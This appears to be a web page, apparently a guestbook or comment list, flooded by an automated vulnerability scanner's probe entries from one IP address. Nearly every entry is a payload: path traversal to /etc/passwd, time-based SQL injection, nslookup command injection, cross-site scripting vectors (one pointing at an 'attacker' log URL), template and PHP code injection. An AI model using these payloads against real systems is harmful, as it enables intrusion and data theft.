12345'"\'\");|]*{ <> [116.113.93.82] 2020-10-28 18:23:08

1

GRLpGpAG [)] 2020-10-28 18:23:08

1

GRLpGpAG [Array] 2020-10-28 18:23:07

1

GRLpGpAG [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 18:23:07

1

GRLpGpAG [116.113.93.82&n995876=v917822] 2020-10-28 18:23:07

1

Зочин [116.113.93.82] 2020-10-28 18:23:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:07

1

S3FMSnNjYkI= [116.113.93.82] 2020-10-28 18:23:07

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:06

Array

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:06

1

GRLpGpAG [file:///etc/passwd] 2020-10-28 18:23:06

1

GRLpGpAG [testasp.vulnweb.com] 2020-10-28 18:23:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:05

Array

GRLpGpAG [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 18:23:05

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:04

12345'"\'\");|]*{ <>

GRLpGpAG [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 18:23:04

1

GRLpGpAG [..] 2020-10-28 18:23:04

1

${10000071+9999456} [116.113.93.82] 2020-10-28 18:23:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:03

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:03

1

GRLpGpAG [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 18:23:03

1

GRLpGpAG [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 18:23:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:02

${10000328+9999926}

GRLpGpAG [1some_inexistent_file_with_long_name.82] 2020-10-28 18:23:02

1

GRLpGpAG [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 18:23:02

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:01

1

GRLpGpAG<esi:include src="http://testasp.vulnweb.com/rpb.png"/> [116.113.93.82] 2020-10-28 18:23:01

1

GRLpGpAG [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 18:23:01

1

GRLpGpAG [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 18:23:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:23:00

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

GRLpGpAG [${10000171+10000135}] 2020-10-28 18:23:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:59

1

GRLpGpAG [aQgfNLwQ'));select pg_sleep(6); -- ] 2020-10-28 18:22:59

1

GRLpGpAG [%2fetc%2fpasswd] 2020-10-28 18:22:59

1

GRLpGpAG [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 18:22:58

1

GRLpGpAG [pABtoH8m');select pg_sleep(3); -- ] 2020-10-28 18:22:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:58

1

GRLpGpAG [/etc/passwd] 2020-10-28 18:22:58

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:57

1

GRLpGpAG [qtOYX3oE';select pg_sleep(9); -- ] 2020-10-28 18:22:57

1

GRLpGpAG [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 18:22:57

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:57

1

GRLpGpAG [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 18:22:56

1

GRLpGpAG [Array] 2020-10-28 18:22:56

1

GRLpGpAG [0jV7Ptuv'; waitfor delay '0:0:9' -- ] 2020-10-28 18:22:55

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 18:22:55

1

GRLpGpAG [Array] 2020-10-28 18:22:55

1

GRLpGpAG [../../../../../../../../../../etc/passwd.82] 2020-10-28 18:22:54

1

GRLpGpAG [1 waitfor delay '0:0:9' -- ] 2020-10-28 18:22:54

1

GRLpGpAG [12345'"\'\");|]*{ <>] 2020-10-28 18:22:54

1

5PJrgGhe [116.113.93.82] 2020-10-28 18:22:54

1

&nslookup ai37XJ9o&'\"`0&nslookup ai37XJ9o&`' [116.113.93.82] 2020-10-28 18:22:54

1

GRLpGpAG [(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/] 2020-10-28 18:22:53

1

GRLpGpAG [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 18:22:53

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:53

fmna08pe

"+response.write(9933050*9889060)+" [116.113.93.82] 2020-10-28 18:22:53

1

$(nslookup PJhxiLF0) [116.113.93.82] 2020-10-28 18:22:53

1

GRLpGpAG [../../../../../../../../../../../../../../../proc/version] 2020-10-28 18:22:52

1

GRLpGpAG [0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z] 2020-10-28 18:22:52

1

'+response.write(9933050*9889060)+' [116.113.93.82] 2020-10-28 18:22:52

1

set|set&set [116.113.93.82] 2020-10-28 18:22:52

1

response.write(9933050*9889060) [116.113.93.82] 2020-10-28 18:22:51

1

GRLpGpAG [] 2020-10-28 18:22:51

1

GRLpGpAG [../../../../../../../../../../etc/passwd] 2020-10-28 18:22:51

1

GRLpGpAG [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 18:22:51

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:50

&nslookup Ec4SfAeM&'\"`0&nslookup Ec4SfAeM&`'

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:50

"+response.write(9836879*9634039)+"

GRLpGpAG [if(now()=sysdate(),sleep(3),0)] 2020-10-28 18:22:50

1

GRLpGpAG [BxszVTKW] 2020-10-28 18:22:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:49

'+response.write(9836879*9634039)+'

GRLpGpAG [-1" OR 2+348-348-1=0+0+0+1 -- ] 2020-10-28 18:22:49

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:48

$(nslookup 8oC44zhS)

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:48

response.write(9836879*9634039)

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:47

set|set&set

GRLpGpAG [-1' OR 2+896-896-1=0+0+0+1 or '3eCCpXCw'='] 2020-10-28 18:22:47

1

GRLpGpAG [-1' OR 2+59-59-1=0+0+0+1 -- ] 2020-10-28 18:22:45

1

GRLpGpAG [-1 OR 2+67-67-1=0+0+0+1] 2020-10-28 18:22:44

1

GRLpGpAG [&nslookup SAoyj43r&'\"`0&nslookup SAoyj43r&`'] 2020-10-28 18:22:43

1

GRLpGpAG [-1 OR 2+473-473-1=0+0+0+1 -- ] 2020-10-28 18:22:43

1

GRLpGpAG [$(nslookup sGUTKAMo)] 2020-10-28 18:22:42

1

GRLpGpAG [KrQdxiOO] 2020-10-28 18:22:42

1

GRLpGpAG ["+response.write(9313065*9432050)+"] 2020-10-28 18:22:41

1

GRLpGpAG [set|set&set] 2020-10-28 18:22:41

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:41

1

GRLpGpAG ['+response.write(9313065*9432050)+'] 2020-10-28 18:22:40

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:22:39

1

GRLpGpAG [response.write(9313065*9432050)] 2020-10-28 18:22:38

1

GRLpGpAG [116.113.93.82] 2020-10-28 18:14:00

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:32:20

1

GRLpGpAG"><script>y4yw(9356)</script> [116.113.93.82] 2020-10-28 17:32:15

1

GRLpGpAG"sTYLe='acu:Expre/**/SSion(y4yw(9949))'bad=" [116.113.93.82] 2020-10-28 17:32:06

1

[116.113.93.82] 2020-10-28 17:31:57

1

%47%52%4C%70%47%70%41%47%22%6F%6E%6D%6F%75%73%65%6F%76%65%72%3D%79%34%79%77%28%39%37%34%35%29%22 [116.113.93.82] 2020-10-28 17:31:52

1

GRLpGpAG\u0022onmouseover=y4yw(9629)\u0022 [116.113.93.82] 2020-10-28 17:31:38

1

GRLpGpAG" 56D5=y4yw([!+!]) z5U=" [116.113.93.82] 2020-10-28 17:31:31

1

GRLpGpAG"onmouseover=y4yw(9686)" [116.113.93.82] 2020-10-28 17:31:30

1

GRLpGpAG<NAK2cx< [116.113.93.82] 2020-10-28 17:31:21

1

GRLpGpAG<img sRc='http://attacker-9567/log.php? [116.113.93.82] 2020-10-28 17:31:15

1

GRLpGpAG<pXIgv4 x=9478> [116.113.93.82] 2020-10-28 17:31:12

1

GRLpGpAG<ifRAme sRc=9565.com></IfRamE> [116.113.93.82] 2020-10-28 17:31:11

1

GRLpGpAG<WSU8RY>5SPTQ[!+!]</WSU8RY> [116.113.93.82] 2020-10-28 17:31:09

1

GRLpGpAGG1lV6 <ScRiPt >y4yw(9151)</ScRiPt> [116.113.93.82] 2020-10-28 17:31:04

1

GRLpGpAG<% contenteditable onresize=y4yw(9322)> [116.113.93.82] 2020-10-28 17:30:59

1

GRLpGpAG}body{acu:Expre/**/SSion(y4yw(9479))} [116.113.93.82] 2020-10-28 17:30:56

1

GRLpGpAG<img<!-- --> src=x onerror=alert(9680);//><!-- --> [116.113.93.82] 2020-10-28 17:30:53

1

[url=http://www.vulnweb.com][/url] [116.113.93.82] 2020-10-28 17:30:47

1

<a HrEF=jaVaScRiPT:> [116.113.93.82] 2020-10-28 17:30:42

1

<a HrEF=http://www.vulnweb.com></a> [116.113.93.82] 2020-10-28 17:30:34

1

GRLpGpAG<input autofocus onfocus=y4yw(9822)> [116.113.93.82] 2020-10-28 17:30:26

1

[116.113.93.82] 2020-10-28 17:30:14

1

GRLpGpAG<ScRiPt>y4yw(9640)</sCripT> [116.113.93.82] 2020-10-28 17:30:08

1

GRLpGpAG\u003CScRiPt\y4yw(9961)\u003C/sCripT\u003E [116.113.93.82] 2020-10-28 17:30:06

1

%47%52%4C%70%47%70%41%47%3C%53%63%52%69%50%74%20%3E%79%34%79%77%289464%29%3C%2F%73%43%72%69%70%54%3E [116.113.93.82] 2020-10-28 17:30:03

1

GRLpGpAG<img/src=">" onerror=alert(9772)> [116.113.93.82] 2020-10-28 17:29:56

1

GRLpGpAG<img src=xyz OnErRor=y4yw(9256)> [116.113.93.82] 2020-10-28 17:29:54

1

GRLpGpAG<img src=//testasp.vulnweb.com/t/dot.gif onload=y4yw(9651)> [116.113.93.82] 2020-10-28 17:29:50

1

GRLpGpAG<body onload=y4yw(9845)> [116.113.93.82] 2020-10-28 17:29:29

1

GRLpGpAG<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9606'> [116.113.93.82] 2020-10-28 17:29:22

1

GRLpGpAG<isindex type=image src=1 onerror=y4yw(9097)> [116.113.93.82] 2020-10-28 17:29:13

1

GRLpGpAG<svg [116.113.93.82] 2020-10-28 17:29:09

1

GRLpGpAG<video><source onerror="javascript:y4yw(9817)"> [116.113.93.82] 2020-10-28 17:29:07

1

GRLpGpAG<ScRiPt >y4yw(9607)</ScRiPt> [116.113.93.82] 2020-10-28 17:29:02

1

GRLpGpAG<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9162></ScRiPt> [116.113.93.82] 2020-10-28 17:28:59

1

GRLpGpAG<ScRiPt >y4yw(9457)</ScRiPt> [116.113.93.82] 2020-10-28 17:28:56

1

GRLpGpAG<ScR<ScRiPt>IpT>y4yw(9049)</sCr<ScRiPt>IpT> [116.113.93.82] 2020-10-28 17:28:49

1

GRLpGpAG<script>y4yw(9260)</script> [116.113.93.82] 2020-10-28 17:28:44

1

GRLpGpAG<WTX4ND>4J0BK[!+!]</WTX4ND> [116.113.93.82] 2020-10-28 17:28:37

1

GRLpGpAG<ScRiPt >y4yw(9843)</ScRiPt> [116.113.93.82] 2020-10-28 17:28:34

1

{{10000284*10000120}} [116.113.93.82] 2020-10-28 17:28:30

1

acux7269 [116.113.93.82] 2020-10-28 17:28:26

1

acu5671<s1﹥s2ʺs3ʹuca5671 [116.113.93.82] 2020-10-28 17:28:23

1

{{9999056*9999531}} [116.113.93.82] 2020-10-28 17:28:20

1

acux1986 [116.113.93.82] 2020-10-28 17:28:18

1

acu6166<s1﹥s2ʺs3ʹuca6166 [116.113.93.82] 2020-10-28 17:28:09

1

GRLpGpAG9055738 [116.113.93.82] 2020-10-28 17:28:02

1

'"()&%<acx><ScRiPt >y4yw(9473)</ScRiPt> [116.113.93.82] 2020-10-28 17:27:54

1

GRLpGpAG'"()&%<acx><ScRiPt >y4yw(9054)</ScRiPt> [116.113.93.82] 2020-10-28 17:27:46

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:41

1<idVJ4M<

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:39

1<img sRc='http://attacker-9385/log.php?

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:35

1<6lASsU x=9238>

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:28

1<ifRAme sRc=9098.com></IfRamE>

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:26

1<WTKT7X>EHJX2[!+!]</WTKT7X>

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:22

1FJzRx <ScRiPt >y4yw(9813)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:19

1<% contenteditable onresize=y4yw(9354)>

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:16

1}body{acu:Expre/**/SSion(y4yw(9331))}

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:14

1<img<!-- --> src=x onerror=alert(9608);//><!-- -->

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:10

[url=http://www.vulnweb.com][/url]

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:08

<a HrEF=jaVaScRiPT:>

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:05

<a HrEF=http://www.vulnweb.com></a>

GRLpGpAG [116.113.93.82] 2020-10-28 17:27:02

1<input autofocus onfocus=y4yw(9516)>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:58

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:56

1<ScRiPt>y4yw(9918)</sCripT>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:47

1\u003CScRiPt\y4yw(9954)\u003C/sCripT\u003E

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:30

%31%3C%53%63%52%69%50%74%20%3E%79%34%79%77%289385%29%3C%2F%73%43%72%69%70%54%3E

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:28

1<img/src=">" onerror=alert(9048)>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:26

1<img src=xyz OnErRor=y4yw(9671)>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:23

1<img src=//testasp.vulnweb.com/t/dot.gif onload=y4yw(9448)>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:20

1<body onload=y4yw(9008)>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:16

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9824'>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:11

1<isindex type=image src=1 onerror=y4yw(9180)>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:07

1<svg

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:05

1<video><source onerror="javascript:y4yw(9447)">

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:02

1<ScRiPt >y4yw(9532)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 17:26:00

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9434></ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:57

1<ScRiPt >y4yw(9390)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:53

1<ScR<ScRiPt>IpT>y4yw(9406)</sCr<ScRiPt>IpT>

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:38

1<script>y4yw(9071)</script>

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:36

1<WPTFJV>KEKRG[!+!]</WPTFJV>

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:34

1<ScRiPt >y4yw(9441)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:32

{{9999896*10000187}}

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:30

acux3568

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:26

acu5443<s1﹥s2ʺs3ʹuca5443

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:17

19905956

GRLpGpAG [116.113.93.82] 2020-10-28 17:25:04

'"()&%<acx><ScRiPt >y4yw(9483)</ScRiPt>

GRLpGpAG [116.113.93.82] 2020-10-28 17:24:57

1'"()&%<acx><ScRiPt >y4yw(9189)</ScRiPt>

GRLpGpAG [116.113.93.82<7e3goe<] 2020-10-28 17:24:44

1

GRLpGpAG [116.113.93.82<img sRc='http://attacker-9610/log.php?] 2020-10-28 17:24:42

1

GRLpGpAG [116.113.93.82<gWrPYl x=9751>] 2020-10-28 17:24:40

1

GRLpGpAG [116.113.93.82<ifRAme sRc=9060.com></IfRamE>] 2020-10-28 17:24:34

1

GRLpGpAG [116.113.93.82<W1HNCH>AIEWD[!+!]</W1HNCH>] 2020-10-28 17:24:22

1

GRLpGpAG [116.113.93.82hxLmY <ScRiPt >y4yw(9922)</ScRiPt>] 2020-10-28 17:24:11

1

GRLpGpAG [116.113.93.82<% contenteditable onresize=y4yw(9536)>] 2020-10-28 17:24:08

1

GRLpGpAG [116.113.93.82}body{acu:Expre/**/SSion(y4yw(9930))}] 2020-10-28 17:24:04

1

GRLpGpAG [116.113.93.82<img<!-- --> src=x onerror=alert(9003);//><!-- -->] 2020-10-28 17:24:01

1

GRLpGpAG [[url=http://www.vulnweb.com][/url]] 2020-10-28 17:24:00

1

GRLpGpAG [<a HrEF=jaVaScRiPT:>] 2020-10-28 17:23:50

1

GRLpGpAG [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 17:23:46

1

GRLpGpAG [116.113.93.82<input autofocus onfocus=y4yw(9794)>] 2020-10-28 17:23:42

1

GRLpGpAG [] 2020-10-28 17:23:40

1

GRLpGpAG [116.113.93.82<ScRiPt>y4yw(9163)</sCripT>] 2020-10-28 17:23:35

1

GRLpGpAG [116.113.93.82\u003CScRiPt\y4yw(9541)\u003C/sCripT\u003E] 2020-10-28 17:23:33

1

GRLpGpAG [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%79%34%79%77%289400%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 17:23:29

1

GRLpGpAG [116.113.93.82<img/src=">" onerror=alert(9254)>] 2020-10-28 17:23:25

1

GRLpGpAG [116.113.93.82<img src=xyz OnErRor=y4yw(9057)>] 2020-10-28 17:23:22

1

GRLpGpAG [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=y4yw(9879)>] 2020-10-28 17:23:03

1

WEB-INF\web.xml [116.113.93.82] 2020-10-28 17:22:56

1

GRLpGpAG [116.113.93.82<body onload=y4yw(9946)>] 2020-10-28 17:22:55

1

WEB-INF/web.xml [116.113.93.82] 2020-10-28 17:22:53

1

GRLpGpAG [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9316'>] 2020-10-28 17:22:51

1

/WEB-INF/web.xml [116.113.93.82] 2020-10-28 17:22:49

1

GRLpGpAG [116.113.93.82<isindex type=image src=1 onerror=y4yw(9032)>] 2020-10-28 17:22:46

1

GRLpGpAG [116.113.93.82<svg ] 2020-10-28 17:22:44

1

/\../\../\../\../\../\../\../etc/passwd [116.113.93.82] 2020-10-28 17:22:43

1

file:///etc/passwd [116.113.93.82] 2020-10-28 17:22:42

1

GRLpGpAG [116.113.93.82<video><source onerror="javascript:y4yw(9715)">] 2020-10-28 17:22:39

1

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ [116.113.93.82] 2020-10-28 17:22:38

1

.. [116.113.93.82] 2020-10-28 17:22:37

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd [116.113.93.82] 2020-10-28 17:22:35

1

GRLpGpAG [116.113.93.82<ScRiPt >y4yw(9197)</ScRiPt>] 2020-10-28 17:22:35

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd [116.113.93.82] 2020-10-28 17:22:34

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:33

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:32

1

GRLpGpAG [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9598></ScRiPt>] 2020-10-28 17:22:32

1

pzRvypDN'));select pg_sleep(3); -- [116.113.93.82] 2020-10-28 17:22:31

1

kGP5zc24');select pg_sleep(3); -- [116.113.93.82] 2020-10-28 17:22:30

1

[116.113.93.82] 2020-10-28 17:22:30

1

1xbXSzZN';select pg_sleep(10); -- [116.113.93.82] 2020-10-28 17:22:29

1

GRLpGpAG [116.113.93.82<ScRiPt >y4yw(9300)</ScRiPt>] 2020-10-28 17:22:27

1

YArTayRa'; waitfor delay '0:0:10' -- [116.113.93.82] 2020-10-28 17:22:27

1

/.././.././.././.././.././.././.././../etc/./passwd%00 [116.113.93.82] 2020-10-28 17:22:27

1

1 waitfor delay '0:0:10' -- [116.113.93.82] 2020-10-28 17:22:26

1

(select(0)from(select(sleep(10)))v)/*'+(select(0)from(select(sleep(10)))v)+'"+(select(0)from(select(sleep(10)))v)+"*/ [116.113.93.82] 2020-10-28 17:22:24

1

%2fetc%2fpasswd [116.113.93.82] 2020-10-28 17:22:24

1

GRLpGpAG [116.113.93.82<ScR<ScRiPt>IpT>y4yw(9832)</sCr<ScRiPt>IpT>] 2020-10-28 17:22:23

1

0"XOR(if(now()=sysdate(),sleep(7),0))XOR"Z [116.113.93.82] 2020-10-28 17:22:22

1

0'XOR(if(now()=sysdate(),sleep(7),0))XOR'Z [116.113.93.82] 2020-10-28 17:22:21

1

[116.113.93.82] 2020-10-28 17:22:21

1

GRLpGpAG [116.113.93.82<script>y4yw(9446)</script>] 2020-10-28 17:22:21

1

JyI= [116.113.93.82] 2020-10-28 17:22:20

1

/etc/passwd [116.113.93.82] 2020-10-28 17:22:20

1

if(now()=sysdate(),sleep(3),0) [116.113.93.82] 2020-10-28 17:22:20

1

@@T2wZt [116.113.93.82] 2020-10-28 17:22:20

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd [116.113.93.82] 2020-10-28 17:22:20

1

GRLpGpAG [116.113.93.82<WG12F6>USVTE[!+!]</WG12F6>] 2020-10-28 17:22:19

1

1 [116.113.93.82] 2020-10-28 17:22:19

1

/../..//../..//../..//../..//../..//etc/passwd.jpg [116.113.93.82] 2020-10-28 17:22:19

1

\ [116.113.93.82] 2020-10-28 17:22:18

1

-1" OR 2+527-527-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 17:22:17

1

-1' OR 2+405-405-1=0+0+0+1 or 'RICX3twp'=' [116.113.93.82] 2020-10-28 17:22:16

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg [116.113.93.82] 2020-10-28 17:22:16

1

../../../../../../../../../../etc/passwd.jpg [116.113.93.82] 2020-10-28 17:22:15

1

GRLpGpAG [116.113.93.82<ScRiPt >y4yw(9120)</ScRiPt>] 2020-10-28 17:22:14

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd [116.113.93.82] 2020-10-28 17:22:14

1

-1' OR 2+196-196-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 17:22:13

1

../../../../../../../../../../../../../../../proc/version [116.113.93.82] 2020-10-28 17:22:12

1

-1 OR 2+839-839-1=0+0+0+1 [116.113.93.82] 2020-10-28 17:22:12

1

1'" [116.113.93.82] 2020-10-28 17:22:12

1

../../../../../../../../../../etc/passwd [116.113.93.82] 2020-10-28 17:22:11

1

-1 OR 2+312-312-1=0+0+0+1 -- [116.113.93.82] 2020-10-28 17:22:11

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:10

WEB-INF\web.xml

NPATV69Z [116.113.93.82] 2020-10-28 17:22:10

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:09

WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:09

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:08

/WEB-INF/web.xml

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:08

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:08

1

GRLpGpAG [{{9999838*10000165}}] 2020-10-28 17:22:08

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:07

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:06

/\../\../\../\../\../\../\../etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:06

JyI=

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:05

ttjclyt0'));select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:05

file:///etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:05

@@syeLy

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:04

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:04

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:04

wGr5Kjug');select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:03

..

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:03

\

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:03

M3gkX8Ec';select pg_sleep(6); --

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:02

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:01

-1));select pg_sleep(3); --

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:01

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:01

-1);select pg_sleep(3); --

GRLpGpAG [acux1438] 2020-10-28 17:22:01

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:00

/.././.././.././.././.././.././.././../etc/./passwd%00

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:00

-1;select pg_sleep(9); --

GRLpGpAG [116.113.93.82] 2020-10-28 17:22:00

1'"

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:59

%2fetc%2fpasswd

<!-- [116.113.93.82] 2020-10-28 17:21:59

1

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:58

MIvTrykP'; waitfor delay '0:0:9' --

GRLpGpAG [116.113.93.82] 2020-10-28 17:21:58

/etc/passwd

${@print(md5(acunetix_wvs_security_test))}\ [116.113.93.82] 2020-10-28 17:21:58

1

